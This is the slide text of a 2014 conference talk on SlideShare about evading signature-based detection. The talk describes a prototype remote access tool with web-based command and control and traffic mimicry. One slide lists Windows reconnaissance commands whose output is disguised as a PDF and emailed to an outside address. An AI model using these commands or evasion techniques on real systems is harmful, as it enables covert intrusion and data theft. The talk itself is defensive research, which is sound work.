Hiding in plain sight

1,094 views

Published on

This talk focuses on various ways to attempt to be as much like normal users/behavior/traffic as possible. We also demonstrate the limitations of signature-based detection systems and then discuss a prototype Remote Access Tool (RAT) that is designed to blend in with normal activity.

Presented at CodeMash, January 8, 2014

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,094
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
8
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Hiding in plain sight

  1. 1. Hiding in Plain Sight Rob Gillen @argodev This work is licensed under a Creative Commons Attribution 3.0 License.
  2. 2. Disclaimer The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
  3. 3. HTDCS Helpdesk Ticket Driven Cyber Security
  4. 4. Demonstration CHALLENGES OF SIGNATURE TOOLS
  5. 5. Network Overview
  6. 6. Attack Pattern
  7. 7. Attack Pattern
  8. 8. Attack Pattern
  9. 9. Attack Pattern
  10. 10. Client Compromise (Simple)
  11. 11. Client Compromise (Encoded & SSL)
  12. 12. Overview • • • • • RAT Design Encryption Command/Control (C2) AntiVirus Behavior
  13. 13. RAT Design • Exe is dropped via infected page • Queries web page for commands • Performs commands if not done previously • Periodically polls for new commands
  14. 14. Encryption • Complex Encryption is trivial • PBKDF – Scrypt sequential memoryhard function • Many iterations (> 10K) • Long key-lengths
  15. 15. Encryption Example • Above configuration is customhardware resistant – Takes approximately ¼ second per guess
  16. 16. Command/Control • Use Web2C Approach – Commands are “issued” en masse via normal, benign looking web pages – Common ports – Leverages existing HTML/server constructs
  17. 17. Command Text ipconfig /all > %APPDATA%info.txt net start >> %APPDATA%info.txt tasklist /v >> %APPDATA%info.txt net user >> %APPDATA%info.txt net localgroup administrators >> %APPDATA%info.txt netstat -ano >> %APPDATA%info.txt net use >> %APPDATA%info.txt copy %APPDATA%info.txt %APPDATA%output.pdf del %APPDATA%info.txt sendmail %APPDATA%output.pdf Status Update “Jones, William E. wejones@yourorg.gov” itebaffe836@yopmail.com smtp.yourorg.gov del %APPDATA%output.pdf
  18. 18. Mimic User Behavior • Traffic Rates – Monitor incoming/outgoing network traffic for X days – Configure xfil to stay within X% of “normal” • C2 – Exponential/randomized stand-down – Only comm during periods of activity
  19. 19. Mimic User Behavior • Target URLs – Monitor outgoing web queries/URLs for X days – Use similar domain names for malicious traffic – Append similar/same query strings to malicious requests
  20. 20. Hiding in Logs v-client-5b.sjc.dropbox.com snt-re3-9a.sjc.dropbox.com yn-in-f125.1e100.net l1.ycs.vip.dcb.yahoo.com snt-re3-9a.sjc.drpbox.com ip-69-31-29-228.nlayer.net a23-47-20-211.deploy.static.akamaitechnologies.com l3.ycs.vip.dcb.yahoo.com ir2.fp.vip.bf1.yahoo.com www.nbcnews.com.edgesuite.net wac.946A.edgecastcdn.net a2.twimg.com
  21. 21. Other Hiding Techniques • Office File content embedding • Creative location
  22. 22. Next Steps • Know what you can and can’t see • Consider implications of your monitoring strategy • Behavior *must* play a role
  23. 23. Questions/Contact Rob Gillen rob@gillenfamily.net http://rob.gillenfamily.net @argodev

×